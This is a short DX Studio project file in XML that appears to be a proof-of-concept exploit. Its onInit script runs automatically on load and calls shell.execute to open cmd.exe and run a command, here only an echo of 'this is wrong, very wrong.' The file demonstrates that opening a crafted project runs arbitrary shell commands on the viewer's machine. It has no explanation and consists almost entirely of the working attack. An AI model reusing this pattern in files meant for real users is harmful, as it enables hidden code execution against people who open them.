<?xml version="1.0" encoding="utf-8" standalone="yes"?> <dxstudio version="1.0.0" width="800" height="600" defaultscriptlanguage="javascript"> <display frame="yes" hidecursor="no" hideconsole="no" hidecontext="no" maxfps="100" unthrottled="no" priority="normal" syncrefresh="yes" changeresolution="no" userresize="yes" workarea="no" windowmask="no" src="" minplayerversion="1.0.0"> <loading console="yes" custom="no" custombackground="no" customlogo="yes" showversion="no"> <prop id="background" type="color" r="0" g="0" b="0" a="1" /> <logo src="" /> <customprogress /> </loading> </display> <script> <![CDATA[function onInit() { shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.") } ] ]> </script> <licenseinfo stamp="cgdaaaaa" /> <security> <prop id="password" type="string" value="" /> <prop id="allowplayer" type="bool" state="no" /> <prop id="nocache" type="bool" state="yes" /> </security> </dxstudio>